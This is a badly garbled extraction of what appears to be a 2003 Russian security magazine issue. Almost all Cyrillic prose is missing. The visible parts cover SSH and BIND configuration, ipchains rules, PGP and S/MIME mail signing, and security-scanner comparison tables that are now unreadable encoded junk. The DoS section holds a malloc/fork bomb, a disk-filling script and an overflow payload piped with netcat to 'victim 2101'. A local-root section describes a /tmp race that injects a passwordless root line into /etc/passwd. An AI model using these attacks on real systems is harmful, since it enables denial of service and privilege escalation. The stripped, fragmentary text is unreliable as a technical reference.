ssh 1).
ssh.



:
RSA,
. .
$HOME/.rhosts,
$HOME/.shosts, /etc/hosts.equiv
/etc/ssh/shosts.equiv,
( , ..
ip- ),
/etc/
ssh/ssh_known_hosts $HOME/.ssh/
known_hosts. , ,

, ,
,
, /etc,
. :
! .rhosts ,
( );
! .shosts .rhosts,

ssh,

1(2), 2003

.
.shhosts:
user1.test.ru user1 userstend.test.ru
user1 null.test.ru user1

! /etc/hosts.equiv

/ ,
;
/etc/shosts.equiv hosts.
equiv, ssh,
. :
/etc/shhosts.equiv + user1.test.ru
user1 server.test.ru xakep

+

, -
.
* /etc/ssh/ssh_known_hosts $HOME/
.ssh/known_hosts

.

. ,
,
(
) . ,
. , ,
. ,


ssh_known_hosts.
3- : ( , ),
(!) (). known_hosts:
user1.test.ru
{SOME_VERY_LONG_PUBLIC_KEY}

(name.domain),
. ,
* ?. -

ssh (identity.pub)
.

ssh_known_hosts
(aka root).
:
ssh_known_hosts, .. ,

.
,
.




(
) , , . , , , .
,
,
(,
openssh).
ssh-keygen.
sshkeygen -t {RSA DSA}, , sshkeygen -t rsa RSA
1024 . , , -f (
$HOME/.ssh/id_rsa $HOME/.ssh/
id_dsa rsa dsa ),
:
-b: ssh-keygen -t rsa -b 2048 -f
$HOME/.ssh/id_rsa


, , ( 10- ).
( ,

29


ssh-agent).
ssh-keygen
: ( ), .pub
(id_rsa.pub). $HOME/
.ssh/authorized_keys.
. authorized_keys
,
:
.
,
, , ,
,
. , .
,
.

ssh-copy-id. :
# ssh-copy-id
user@machine

-i public_key_file


machine user ( ,
)
( )
, public_key_file ( $HOME/
.ssh/identity.pub,
) $HOME/.ssh/
authorized_keys.
, .
,
,
(, ).

:

,
-

30

. ,
, , ssh
, ,
ssh . , , 1 . , ...
,
, .
:
, , (
).
ssh ssh_config sshd.conf .
$HOME/.ssh/config /etc/
ssh/ssh_config ( ).
: . * ?,

, ( ).
ssh_config, (

ssh
, ..
):
# ,
test.ru, *

Host *.test.ru
# , ssh
X
. , ssh.

(X, pop, smtp, ftp) ssh. no
ForwardX11 yes
# ssh 2.
,
,
PreferredAuthentications hostbased,
publickey,keyboard-interactive
# ,
-

. yes.
PasswordAuthentication yes
# ,
.

NumberOfPasswordPrompts 3
#
. : , ,
, (USER@HOST
-
). * ?.
AllowGroups,
DenyUsers DenyGroups(
)
AllowUsers *@*.test.ru DenyUsers xakep
lamer DenyGroups x*
# ssh(2 ) rhosts RSA .
no
HostbasedAuthentication yes
#
rsh, ssh .
no
FallBackToRsh no
# rsh. no
UseRsh no
# ,
. no
BatchMode no
#
known_hosts, ip. yes
CheckHostIP yes
# ,

. : yes - known_hosts,
ask -
known_hosts
, no - known_hosts (). ask
StrictHostKeyChecking ask
# ssh :
rsa dsa
IdentityFile $HOME/.ssh/id_rsa
IdentityFile $HOME/.ssh/id_dsa
# , ssh. 22
Port 22
,
Protocol 2
# 1 ssh
Cipher 3des
#
2
Ciphers aes128-cbc,3des-cbc,blowfishcbc,cast128-cbc,arcfour,aes192cbc,aes256-cbc
# escape-, ,
( ~.
) none, -


escape . ~
EscapeChar ~
# .
, ..

.
, , .

.
no
Compression yes
# ,
, , .
, ,

. yes
KeepAlive yes

,

:
, ssh 1

( )
.
. sshd
/etc/ssh/sshd_config,
ssh_config, ,
ssh_config.
sshd_config, :
#
Port 22 Protocol 2
# , ,

(server.test.ru:2022), ssh
,
.. ( ?)
ListenAddress server.test.ru
# 1
HostKey /etc/ssh/ssh_host_key
# rsa dsa ssh 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
#
ssh 1 (
)
KeyRegenerationInterval 3600
ServerKeyBits 768
# .

1(2), 2003

# ,

LoginGraceTime 600
# ssh . , ,
ssh (

iptables).
: without-password,
PermitRootLogin yes
# sshd .
,
0777.
(
, , ,
- ,
)
StrictModes yes
# RSA ( 1)
RSAAuthentication yes
#
( 2)
PubkeyAuthentication yes
# .
: %u , %h
AuthorizedKeysFile
.ssh/
authorized_keys
# rhosts
RhostsAuthentication no
# rhosts
shosts hostbased autentification,
known_hosts
IgnoreRhosts yes
#
known_hosts .rhosts
.shosts.
1
RhostsRSAAuthentication no
# , 2
HostbasedAuthentication yes
# known_hosts,
hostbased
autentification. no
IgnoreUserKnownHosts no
# ssh
no.

PasswordAuthentication yes
# , , .. ,
!
no ( )
PermitEmptyPasswords no
# PAM
PAMAuthenticationViaKbdInt no
# ssh
X11Forwarding yes
# x- , .. , x-


,
, !
X11UseLocalhost yes
# /
etc/motd:
PrintMotd yes
#
, ,
PrintLastLog yes
#
KeepAlive yes
# , . , ,

MaxStartups 10
# ,
Banner /etc/ssh_message
# ip-
backzone,
ip . ()
ip,

VerifyReverseMapping no
# , ssh.
ftp sftp, ,
(..

, , proftpd). ,
ssh , ssh. , sftp-
sftp-.
ftp,
:
( ssh),
,
sftp. Subsystem sftp
/usr/lib/
ssh/sftp-server

, !
, ssh.
. SSH ,
, , ,
.
, .
, ,
,

31


(
).
ssh
:

IgnoreHosts
RhostsAuthentication
RhostsRSAAuthentication
RSAAuthentication
HostbasedAutentification
PasswordAuthentication
PermitEmptyPasswords
UseLogin

yes
no
no
yes
no
no
no
no

PermitRootLogin without-password
- L{LOCAL_PORT}:{LOCAL_ADDRESS}:
{REMOTE_PORT}:
# ssh -L10101:localhost:101
server.test.ru


, ..
. ,
sleep :
# ssh -f -L10101:
loclahost:101 server.test.ru sleep 100


100 , . :
,
,
ftp smtp
pop3 (, sftp- openssh,

sftp [user@]hostname, ..

ssh sftp
ssh).

,
sshd AllowTcpForwarding no. ssh
, ..
( ssh 2
).
ssh. rsa
4096 :
# ssh-keygen -t rsa -b 4096


ssh-copy-id
():
# ssh-copy-id -i $HOME/.ssh/id_rsa
remote_host

hostbased sshd_config:

32

1 (
Protocol 2,1 ssh 1, ssh 2):
Protocol 2

, ssh (
!) . ,
?

(, bash)
ssh .
sshagent ( ssh).
(ssh-agent ).
sshadd, $HOME/.ssh/id_rsa, id_dsa, identity.

, ssh-add
: ssh-add filename. ,
ssh-add , (
), :
ssh-agent. sshagent
, (
), .. .
ssh-agent:
# ssh-agent bash # ssh-add Enter
passphrase for .ssh/id_rsa: Enter
passphrase for .ssh/id_dsa: .ssh/
identity : No such file or directory

ssh-agent ,
.
,

. AllowUsers sshd_config

iptables. ,
ssh.
ssh
(PermitRootLogin no)
sudo.
2 ( ,

,
, 2 ssh
). ssh,
:
Windows:
! putty:
http://www.chiark.greenend.org.uk/
~sgtatham/putty.html
! raju:
ftp://ftp.franken.de/pub/win32/
develop/gnuwin32/cygwin32/
porters/mathur_raju
! cigaly:
http://www.doc.ic.ac.uk/~ci2/ssh/
! f-secure:
http://www.datafellows.com/f-secure/
fclintp.htm
! secure crt: http://www.vandyke.com/
products/securecrt/
! ttssh:
http://www.zip.com.au/
~roca/ttssh.html
! therapy:
http://guardian.htu.tuwien.ac.at/
therapy/ssh/
! chaffee:
http://bmrc.berkeley.edu/
people/chaffee/winntutil.html
! sergey okhapkin:
http://www.lexa.ru/sos/
! fissh:
http://www.massconfusion.com/ssh/
Mac:

! niftytelnet+ssh:
http://www.lysator.liu.se/
~jonasw/freeware.html
! f-secure:
http://www.datafellows.com/f-secure/
fclintp.htm
ssh www.heimhardt.com,
www.openssh.com, ssh ( 1) www.opennet.ru.




.


. :



- .
.

Local D.o.S. attack


D.o.S.- (Denial of Access ) ,
.
, . / .
D.o.S. ( ) (
*nix ):

{
while(1) /* */
{
malloc(10000);
/* man: calloc, malloc, free,
realloc Allocate and free dinamic
memory */
fork();
/* : fork create a child
process ( -)*/
}
}


,
- ,

(Ctrl+Alt+Del),
Reset,
.

. ,
syslogd (
Windows NT-based)
(
)
shell:
Echo.c :

LocalDoS.c:
#include <stdio.h>
main ()

34

#include <stdio.h>
void main()
{
while (1)

printf (X); /* X*/


}
disk_DoS.sh :
#!/bin/sh
./echo > /tmp/.



. ( ),
, ls
( -a).
, ( )
. , :
/,

, ,
. ,
vi , .
,

( /tmp, /var, /home),


,

mount, , siud-

?

. cron , , shell-, ,
/root.
, (
)
,
. find,
xargs gzip.

Remote D.o.S. attack


D.o.S.- .
,
- ,
. /,
.
,
.

, , .

TCP/IP. .

(client) (victim). , ,
- /, ,

1(2), 2003

,
- .
,
:

TCP-,
SYN
ACK.
. ,
( )
ACK SYN-
. ,
, . ;
.
.

SYN- .
/
- .
.


, ,
, ,
.

, -
.
, .

,

.
.
victim :

-

,
, ,
( ,
, client
victim).
,
- ,
.
, ,

. ,
. , ,
.
TCP-. .
, ,
,

.
, ,
,
, .
D.o.S.-

.
:
.


. (buffer overflow). ,
.
, -

35


, , 2101,
- ,
, , root@localhost
(
). ,
: , , 32 768
. , - ,
, .
32 768
- . , . , ,
.

. ,
,
, . , , . ,
,
.

,
, ,
, ,
, 32 770 . , ,
char_echo,
nc (net cat):
Char_echo.II.c :
#include <stdio.h>
main ()
{
int i; /* */
for (i=0; i<=33000; i++) /*
33000 ""*/
printf ("X"); /* 'X'*/
}
go.sh :
#!/bin/sh
./echo_char | nc victim 2101

, , . , . , , /

36

- .

;
.
,
, -
kernel
panic ( *nix ),
The blue screen of death ( Windows-). , , ,
, .

- . .
WinNuke.
, , ,
Windows.

Linux
OpenBSD.
, .

, - .
.
, . ,
, ,
.
. : ,
, . ,

-,
, , , --

.
-,
.
, (,
), , - , , , (, tcpspy,
icmplog,). , .
: . ,
SYN flood, , , .

(, , ,
,

-
, ), , ,
. ,
.
,
, , ,
,
. IP-
,
.
, .


,

/ .
,
D.o.S.-,


,
, -


.
, ,

.

Local root attack


, ,
root
Administrator ,

,


( ). .
, , ,
. ,
.
,

, ,
.
SIUD-,

,
. .
, ,
, ,
,

. , .

.
,
. : ,
/tmp/NameOfFile.some_addition. -

1(2), 2003

,
,
,
, , .
SUID-
/tmp/
NameOfFile.PID, PID , , .
, , , . /tmp
, ,
, , . , , . , , /etc/passwd /tmp/
NameOfFile.Guesed_PID. root::0:0:root:/root:/bin/sh. , ,
/etc/passwd?
,
. , ,
,
- ( /etc/passwd
).
.

Remote root attack


root . (,
,
) D.o.S.-,
, ,

. , ,
. ,
, (shell),
, .
(

), .
.

IP-, . ;
,
. , - , .
(grab ) (,

) (
).
, - (log file),
.

, . ,

- (
-
),
. , root shell, , ,
. ,
,
,
.


(

Linux)
Linux,
, ,
, .

37


( )
, ,
,
.
,
,

. .


Linux , ,
, ,
. . ,
, . ( )
(, ,
, www.securityfocus.com
) .
,
,

.
( )
,


,

(http://www.openwall.com/).
, .
(http://
www.lids.org),
,
nmap.

38

, : , , .

37 (time), 69 (tftp), 79 (finger),


111 (sunrpc), 512 (TCP exec; UDP
biff), 513 (TCP login; UDP who), 514
(TCP cmd; UDP syslog), 517 (talk),
525 (timeserver).
, : HTTP/HTTPS, FTP, Telnet/SSH,
SMTP, POP3/IMAP -. .

HTTP/HTTPS

, ,


(,
7- , echo).
.
, , ( )
( , ,
, ,
root).
:
-, (
www.securityfocus.com , ,
); -,

( ,
); -, ,
,
,
.
, , . , ,
,
,
( )
. - , . -

:
*nix Web-server Apache.
, , , (

).
(
/ Apache

).

FTP
: ,

WU-FTP, , , , , .
,
,
ProFTP, BSD
FTPD. ,
FTP- ,

http://www.security.nnov.ru/
articles/sacerdote.asp.

Telnet/SSH

. : (, remote root access
telnet), .
telnet- -


,
(sniffing),
,
.
, , telnet- , ssh.
SSH
telnet, , ,
, : , (
dial-up ),

.

SMTP

( ,
), ,

sendmail.
, ,

. ( ) , qmail (http://cr.yp.to/),

(
) .

POP3/IMAP
,
SMTP-,
qmail, POP3.

Proxy-
, ,
,
Squid, Oops
Apache. - , -

1(2), 2003

Squid Oops.
Squid-, ,
,
,

Oops.
( , , ),
Squid
.

,
,
TCP/IP, ,
( ipchains, 2.2.x).

, ,
,


.

,
; , :
ipchains -P input DENY
ipchains -O output REJECT
ipchains -P forward REJECT

lo0 ( )

(, , , ),
ICMP. , , , , ,
,
.



,
( HTTP, ,
DNS,
):
#client
ipchains
-A
output
-i
$EXTERNAL_INTERFACE -p tcp -s $IPADDR
$UNPRIVPORTS -d
$ANYWHERE 80 -j ACCEPT
ipchains
-A
input
-i
$EXTERNAL_INTERFACE -p tcp ! -y -s
$ANYWHERE 80 -d $IPADDR
$UNPRIVPORTS -j ACCEPT
#server
ipchains
-A
input
-i
$EXTERNAL_INTERFACE -p tcp -s $ANYWHERE
$UNPRIVPORTS -d
$IPADDR 80 -j ACCEPT
ipchains
-A
output
-i
$EXTERNAL_INTERFACE -p tcp ! -y -s $IPADDR
80 -d $ANYWHERE
$UNPRIVPORTS -j ACCEPT
$EXTERNAL_INTERFACE
, ,
$IPADDR ,
$ANYWHERE ,
$UNPRIVPORTS ( 1024 65535).

, : -,

; -,
, ,
,
, ,

, . , , (,
).
,
(
).

39



-

,

.
: , . . , , , , ,
. , .

40

: () . ,
. .
! ,
?
! , , ?
! , ,
?
, , , , . , , , . ,
:



?
,

. ,
. , ,
.
. :
.
, , , (
, ,
. .). , .
.
-
, , (, ), ( ). ,
,
.
. , ,
, . -,
.
, , , . ,
.
,
. .

: , . , , .
, , . , , ,
.

1(2), 2003

,66,QWHUQHW6FDQQHU

,QWHUQHW6HFXULW\6\VWHPV86$
KWWSZZZLVVQHW

0E



*),86$

0E

 
 

0E



0E

0E

/DQ*XDUG

KWWSZZZODQJXDUGFRP
6KDGRZ6HFXULW\6FDQQHU

6DIHW\/DE
KWWSZZZVDIHW\ODEFRP

;6FDQ

;IRFXV&KLQD
KWWSZZZ[IRFXVRUJ

;6SLGHU

3RVLWLYH7HFKQRORJLHV
KWWSZZZSWVHFXULW\UX

, (, , Retina eEye Digital Security NetRecon


Symantec), , , . ,
. ,
, ( ,

). .
, , . , ,
.

, ,
, ,
:
! Solaris 2.6.1
! Windows 2000 Server
! Windows XP Professional
! Linux RedHat 5.2
! Compaq/Tandem Himalaya K2006 (OS D35)
! Bay Networks Router
! AS/400
(
):
! ISS Internet Scanner 6.2.1
! LanGuard 2.0
! ShadowSecurityScanner 5.31
! XFocus X-Scan v1.3 GUI
! XSpider 6.01

,
, , ,
.
1, , . ,

41





6RODULV

WFSHFKR
XGSHFKR
WFSGLVFDUG
WFSGD\WLPH
XGSGD\WLPH
WFSFKDUJHQ
XGSFKDUJHQ
WFSIWS
WFSIWS
WFSWHOQHW
WFSVPWS
WFSVPWS
WFSWLPH
XGSGQV
XGSGQV
WFSVQPSWUDS
XGSVQPS
XGSVQPS
XGSVQPS,QWHUIDFH
XGSVQPS5RXWHV
WFSH[HF
WFSORJLQ
WFSVKHOO
WFSSULQWHU
WFSSULQWHU
WFSXXFS
WFSQIVG
WFSQIVG
WFS;
WFSKWWSG
-LJVDZD
WFSKWWSG
0LQL6HUY
WFSVWDWXV
WFSUXVHUVG
WFSWWGEVHUYHUG
URRW
WFSNFPVBVHUYHU
WFSPRXQWG

WFSERRWSDUDP
WFS53&
,FPSWLPHVWDPS

WFSVWDWXVURRW
)LQJHU
WFSFKDUJHQ'26

42

,66

;6

/*

666

;)


;
;
;
;
;
;
;
;
;
;
;

;


;
;
;
;
;
;
;
;
;

;
;

;



;
;
;
;
;
;
;
;

;
;
;
;
;
;
;




;
;
;
;
;
;
;
;
;
;





;



;

;
;









;
;
;
;

;
;





;

;
;

;
;
;
;
;
;
;
;


;
;



;
;
;
;

;
;

;



;

;
;

;

;
;
;
;

;


















;

;





;
;
;
















;
;












;

;
;


















;




;




;






:LQGRZV6HUYHU

WFSIWS
WFSIWS
WFSIWS
WFSIWS
WFSIWS
WFSIWS
WFSKWWSG
06,,6
WFSKWWSG
WFS5SF
XGSLVDNPS
WFSVTOVHUYHUH[H
WFS0V64/
WFS0V5'3
,FPSWLPHVWDPS

WFS0V64/

:LQGRZV;33URIHVVLRQDO

WFSHFKR
XGSHFKR
WFSGLVFDUG
XGSGLVFDUG
WFSGD\WLPH
XGSGD\WLPH
WFSTRWG
XGSTRWG
WFSFKDUJHQ
XGSFKDUJHQ
WFS5SF
WFS1HW%LRV
WFS1HW%LRV
WFS06'V
XGSLVDNPS
XGSURXWHU
WFS5SF
,FT&OLHQW
XGSXSQS
XGSQWS
WFSKWWSG
,FPSWLPHVWDPS

WFSFKDUJHQ'26

1(2), 2003

,66

;6

/*

666

;)


;

;
;
;

;


;
;
;

;
;
;


;

;



;


;

;
;

;
;


;

;
;


;


;
;



;

;
;

;
;
;



;


;
;



;


;
;



;


;
;


;

,66

;6

/*

666

;)


;
;
;
;
;
;
;
;
;
;
;
;

;
;
;
;
;

;

;


;
;
;

;
;
;
;
;
;
;
;

;


;

;
;
;







;





;
;
;
;










;

;

;

;

;

;
;

;


;



;



;

;

;

;

;

;
;

;









;

;

43


*$6

,66

;6

/*

666

;)


;
;
;
;
;


;





;
;


;

;
;
;

;
;
;
;
;
;
;




;

;
;
;


;










;
;
;
;
;

;

;

;





;
;
;
;
;


;








,66

;6

/*

666

;)


;
;
;
;
;
;


;
;

;

;


;
;

;

;
;
;
;


;

;


;


;

;





;
;



;
;

;

;

;
;
;
;
;

;


;

;
;

;


;

;





WFSIWS
WFSIWS
WFSWHOQHW
WFSVPWS
WFSKWWSG,%0+7736(59(5
WFSKWWSG,%0+7736(59(5
WFSKWWSG
WFSQHWELRV
WFSDVVHUYHUPDS
WFSKWWSG,%0+7736(59(5
WFSKWWSG
WFSKWWSG-DYD:HE6HUYHU
WFSKWWSG
XGSLVDNPS
,FPSWLPHVWDPS

'/LQX[5HG+DW

WFSIWS
WFSIWS
WFSIWS
WFSWHOQHW
WFSWHOQHW
WFSVPWS
WFSVPWS
WFSVPWS
WFSGQV
WFSGQVELQG
WFSKWWSG
WFS1HW%LRV
WFS1HW%LRV
WFSORJLQ
XGSUZKRG
WFSVKHOO
WFSSULQWHU
WFSQIVG
WFSKWWSG&RQIHUHQFH5RRP,5&
WFSKWWSG$SDFKH 8QL[  5HG+DW/LQX[ 
WFSKWWSG
WFSKWWSG&RQIHUHQFH5RRP,5&
,FPSWLPHVWDPS

XGSUZKRG
WFSSULQWHU

(&RPSDT7DQGHPKLPDOD\D. 26' 

WFSHFKR
WFSIWS
WFSWHOQHW
WFSWHOQHW
WFSILQJHU
,FPSQHWPDVN
,FPSWLPHVWDPS

44

;

;
;
;
;
;


;

;


;

;
;
;
;
;
;
;



;













;

;
;

;
;
;
;







;

;







,66

;6

/*

666

;)


;
;
;
;
;
;
;


;
;
;

;





;
;

;




;
;
;

;




;
;
;

;




)%D\1HWZRUNV5RXWHU

XGSHFKR
WFSIWS
WFSWHOQHW

XGSGLVFDUG
WFSIWS
XGSWIWS
XGSQWS
XGSVQPS
XGSURXWHG
/DQG'26

, ,
, .
, .
:
! : +3
! : +2
! : +1
! : -3
! : -2
! : -1
2.
, .


;6FDQ
666
/DQ*XDUG
;6SLGHU
,66


















,66

;6SLGHU

/DQ*XDUG

666

;6FDQ

$6
6RODULV
&RPSDT7DQGHP
+LPDOD\D
:LQGRZV
6HUYHU
:LQGRZV;3
3URIHVVLRQDO
/LQX[5HG+DW
%D\1HWZRUNV
5RXWHU






  


  


  
















  







  





  



  

  







  



















1(2), 2003

,66

;6

/*

666

;)


;
;
;


;
;
;



;
;



;
;



;
;

;
;
;
;
;
;
;


































ISS Internet Scanner
, .
LanGuard . NetBios,
, . , . LanGuard .
ShadowSecurityScanner ISS.
.
, Retina.
. : ,
. X-Scan
,
LanGuard, . :
,
- .
XSpider , , Windows Solaris. XSpider
:
, , . , , Positive Technologies, , , , . , , , , .


, SecurityLab.RU, (. http://www.securitylab.ru/

45


_Services/Vote.asp?Archive=109&Poll_ID=4 ). .
:

"
;VSLGHU
6KDGRZ6HFXULW\6FDQHU
1HVVXV6HFXULW\6FDQQHU
5HWLQD
,QWHUQHW6FDQQHU ,66 
&\EHU&RS6FDQQHU
7\SKRQ,,
16$7
16WHDOWK
+DFN6KLOG












, . ISS (, )
ShadowSecurityScaner.
XSpider, , .
.

, .
, ,
. .




25 2002 Positive Technologies
(www.ptsecurity.ru)
SecurityLab.ru.
Positive Technologies
- -
.

SecurityLab.ru , - .
,
.
, Positive Technologies,
() ,

SecurityLab.ru.
Positive Technologies ,
. , . ,
. ,

. ,
SecurityLab.ru .

, ,
Positive Technologies .

: http://www.securitylab.ru
Positive Technologies: http://www.ptsecurity.ru
E-Mail: info@ptsecurity.ru

46

- 11 , 2001 .

IGUS



DNS

( security teams)
100 % 63%
DNS,
, .
,
.
[main.target.com]
$ORIGIN
target.com.
@
1D
IN

c4
admin
localhost
mail
proxy
www
c1
c2
c3
ns
ftp
@

100 ,
, 57
.
, , (transfer) ( DNS), , , ,

( , ip-, , , . .).
: , ,
www.target.ru; , DNS
nslookup, . :
fenix# nslookup
Nameserver 192.145.45.1
>server www.target.com
>ls -d target.com

- :

48

1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D
1D

IN
IN
IN
IN
IN
IN
IN
1D
IN
1D
1D
IN
IN
IN
IN
IN
IN
IN

SOA

ns root (
2001081109
8H
2H
1W
1D )

;serial
;refresh
;retry
;expiry
;minimum

NS
ns
NS
r1.ns.net.
NS
r2.ns.com.
MX
20 m1.ns.net
MX
10 m2.ns.com
MX
10 main
A
192.5.62.78
IN
A
192.5.62.74
A
127.0.0.1
IN
CNAME main
IN
CNAME main
CNAME main
A
192.5.62.75
A
192.5.62.76
A
192.5.62.77
A
192.5.62.73
CNAME main
SOA
ns root (
2001081109
;serial
8H
;refresh
2H
;retry
1W
;expiry
1D )
;minimum

( ),
, , , ( ) DNS ,
. , , ,
.
, ,
(
) DNS-c.

, ;
DNS .
, . ,
bind 8.x.x.
bind, ,
named.conf (/etc/namedb/named.conf).


, named.conf
acl, ( ip- DNS-,
-
). acl
(named.conf):

named.conf bind:
zone "bind" chaos {
type master;
file "primary/bind";
allow-query { trusted };
allow-transfer { none; };
};

, , :
acl "trusted" {
localhost;
192.168.3.0;
};

, localhost
(192.168.3.0),
c .
options :
options {
...
#
allow-query { trusted };
##
##
allow-transfer { none };
##
## -
allow-recursion { trusted };
## p
##
...
};

bind
( , , ),

zone.
: ,
(slave), ip- , (master), (0.0.127.in-addr.arpa), , :
zone "example.com" {
type master;
file "primary/example.com";
# , options
allow-query { any; };
allow-transfer { localhost; 192.168.3.0; };
};
zone "3.168.192.in-addr.arpa" {
type slave;
file "secondary/0.126.in-addr.arpa";
masters { 192.168.3.1; } ;
# , options
allow-query { any; };
allow-transfer { localhost; };
};
};

, ,
()
(intranet), . . ,
bind , .

1(2), 2003

$TTL 3600
$ORIGIN bind.
@ 1D
CHAOS
SOA localhost.
1
;serial
3H
;refresh
1H
;retry
1W
;expire
1D )
;minimum
CHAOS NS
localhost/
;

root.localhost. {

; , , , . binda : -.
( logging):
logging {
#
# bindy
channel default_ch {
file "/var/log/named.log";
serverity info;
#
#
print-time yes;
#
print-category yes; #
};
channel security_ch {
#
file "/var/log/security.log";
serverity info;
print-time yes;
print-category yes;
};
##
category default { default_ch; };
category security { security_ch; };
};

. ,
,
DNS DNS chrooted environment, sandboxa . ., .

:
1. . . Securing Bind.
2. RFC DNS.
3. man bind.
4. Criag H. Rowland. Securing Bind.

49

50



C.
.
( ) ,

.

, .
,
. , . ,
. (
) ,
(

, ).
,

. :
( , ,
, ,
),
,
. ,
,
-
, - , . ,

, , . , , .
:
,

1(2), 2003

(4096 ),

.
32- , .

, , . (
), , .
,
. The Bat, PGP GnuPG,
S/MIME.
The Bat. . -, The Bat , , MD5
NTLM
( Windows NT ), , , POP SMTP ,

.
PGP S/
MIME. PGP (pretty
good privacy) (
, S/MIME).

. , (
, -,

( )).
, ,
. , 500 ~800 ,
24101 11270 (

)!
PGP :
/ (
). PGP ,

( , ).
Bat PGP,
rfc-1991,
, . PGP
IDEA(128 )
MD5 .
, The Bat PGP,
GnuPG(!),
, ; PGP -> OpenPGP
-> PGP.
PGP (
PGP):
! :
-> OpenPGP-> ,
<Ctrl+N> (
1024 , ,
, 2048 ).
!
, ( ,
).
,

.
: ->
->
-PGP.
.
! .

51

, ,

!
: , ,
OpenPGP OpenPGP ( , PGP,
).
,
, ,
,
. , , -
,
.

<CTRL+SHIFT
+C>, <CTRL
+SHIFT+D>, ,

,

. ,
,
!
PGP
:
:
BEGIN PGP PUBLIC KEY BLOCK
Version: 2.6
mQEPAz2wAdcAAAEIAMbtzluSULSrU3X1
qvf9QBeY+VCI7Pe/Wi0eSun8g7do9V0q ....
END PGP PUBLIC KEY BLOCK

:
BEGIN PGP SIGNED MESSAGE
Hash: MD5 _
BEGIN PGP
SIGNATURE
Version: 2.6
iQEVAwUAPcbEbnuMbS82Jh/FAQFWvwf/
aJEiMj/mUPlHzNLIelDMwJZMxK+9UuBL
END PGP SIGNATURE

:
BEGIN PGP MESSAGEVersion: 2.6
lIwRIouHmq+nJjsBBEA7FCH1rS6C/
hfi4J1MHN+q/EycFltExRTqjIcOtoiDYNvJ
END PGP MESSAGE

PGP ,
PGP . PGP
Version: Hash: (
,
SHA1 (160 ) MD5 (128 )).
PGP ,
.

, PGP
. , The
Bat PGP *nix GnuPG.
-
.
GnuPG PGP, ,
,
. GnuPG (www.gnupg.org)
, .
, www.gnupg.org
, -

.
gnupg.
! gpg help
gnupg (
);
! gpg gen-key
;
! gpg -s -o out_file in_file (-s) in_file
out_file;
! gpg verify signed_file signed_file;
! gpg export
(
stdout) ;
! gpg export armor
: BEGIN
PGP PUBLIC KEY BLOCK
Version:
GnuPG
v1.2.1
(Linux), stdout;
! gpg import filenames ;
! gpg -e -r recipient@mail.ru filename
filename,
recipient@mail.ru (
). -e -s,
;
! gpg fingerprint <username> md5 username
( , username ).
, GnuPG

www.thawte.com
(personal freemail certificate). ,
. e-mail (mail ping)
, . (
), . ,
(IE, Netscape, Opera),
IE, .. Windows.
thawte freemail, ( Trusted root CA).
( !). ,
, thawte freemail .
, Outlook[ Express] .
, ->->-> .
( ) . The Bat Mozilla,
, , . , The Bat . The Bat
, .. . :
Outlook , : Thawte Personal Freemail CA
Personal Freemail RSA 2000.x.x. , Trusted Root CA
- Thawte personal freemail.
Outlook. , Thawte Freemail .
, ( : Thawte Freemail
CA -> Personal freemail RSA 2000.x.x -> Thawte Freemail Member).

52



(self-signed public
key) ,
self-signed. , gnupg armor ( ), /
( -
),
.
armor, gnupg
PGP ().
(-r) gnupg,
.
: e-mail, ,
(
), .
, PGP .
S/MIME.
,

( The Bat, Mozilla
Messenger, Outlook). S/MIME (..
) .
( , ,
) ,

(, , self-signed).

S/MIME
, .
,
S/MIME, ,
S/MIME
. S/MIME
:
Content-Type: multipart/signed;
protocol=application/pkcs7-signature;
micalg=sha1;
boundary=
C61031FF2231ECF0"
This is a cryptographically signed
message in MIME format.
C61031FF2231ECF0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 8bit

1(2), 2003


C61031FF2231ECF0 Content-Type:
application/pkcs7-signature;
name=smime.p7s
Content-Transfer-Encoding:
base64 Content-Disposition:
attachment; filename=smime.p7s
Content-Description:
S/MIME Cryptographic Signature
MIIFPQYJKoZIhvcNAQcCoIIFLjCCBSoCAQMx
CzAJBgUrDgMCGgUAMAsG
CSqGSIb3DQEHAaCCAyow ...
C61031FF2231ECF0

, .
.
, S/MIME ,
, , The Bat, , root ca (
). The Bat , S/MIME,
.
(, , The Bat
S/MIME ).

The Bat ( ,
-). ->S/MIME,
S/MIME, ( ).

,
C .
C . , . , ,

trusted ca.


.

,
-

trusted root
ca.
( ,
, ). , S/MIME
.
The Bat
-> OpenPGP
-> S/MIME.
OpenPGP.
S/MIME,
2 ( 2048
IDEA 128 ).
, -,
The Bat OpenPGP
( gnupg, gpg.exe PATH).

, , ,
OpenPGP,
, ( , ).
...
Win* The Bat gnupg,
*nix gnupg.

(
).
,
:
! www.nobat.ru
The Bat;
! www.gnupg.org
gnupg;
! www.ritlabs.com
The Bat ( -
);
! certs.netscape.com ,
.
, !

53

( )
-.
, .
. , .
.

. .
,
, , 6
, , , . , . , ,
.

54

, , .
, ?
. , , , ,
, .
. ,

.
-
. ,
, .

, .
, ,
. , , . ,

,
.
,
. , , ,
. ,


,
: , .
.
,
!
. ,
,
?
, . ,
, .
?
. . ,

, .
. , .

: , , . ,
. .
,
. ,
.
. : , , ,
, . ,
, .
,
. -
, - . ? , -
, , ,
. ?
, ,
: , , - . ,
, ,
, 99% ,
300 500 .
-
.

1(2), 2003

, -
.
? .
, ? ?
, . . ,
,
.
.
. 1991

. . ,
,
. .

? , !

,
.
, , ,
,
. .

. , , .
, - .
,
, , . ,
, . ,
. , , .
,
1999- , . -

. . . . , ,
. . 98-
, .
, -
. , ,
, - .
. .
, . , ,
.
, ,
,
. , . , .
.
. ,
.
, ,
. !
.
, . - -1.
, , . , . ,
85 , .
, , ,
,
.
.
.
.

?
. .
-, : -

55


.
, .
, 10 . .
.
. ,
, . , ...
.
.

, .
, ecommere. , . ,
,
, .
, , , ,
. ,
,
,
. , ,
.

,
. , . - -
.
?
, ? .

. 17
. 2- .
,

56

. .
.
,
?
?
.
1986- , -86, . , . , 82 , .
, 8088, XT-.
,
. , ,
,
. ,
, , : , ! . , ,
, .
, ?
, .
, .
,
, . ,
. ,
. , ,
, . , .
. ,
.
,
- , .

, ,
, !
. . ,
, , ,
. . -

,
-
.
, , .

, ,
.
.
, , ,
.
. ,
- . , ,
.
.
, , , , . ,
. .
,
,
, ,
1998-
, . . ,
.
, . , ,
, , .
,
.
,
, .
,
,
,
. , . ,
.
. .


,

.
.

, . . , ,
, . , , . .
, .
, .

. ,
, ?
. ,
. .
. . ,
, .
. , . .
.
,
.
. , .
? , ? . ? . ,
,
- , . , .
, .

1(2), 2003

. , , ,
.
30%
. . ,
,
. , , .
, .
,
.
! ,
.
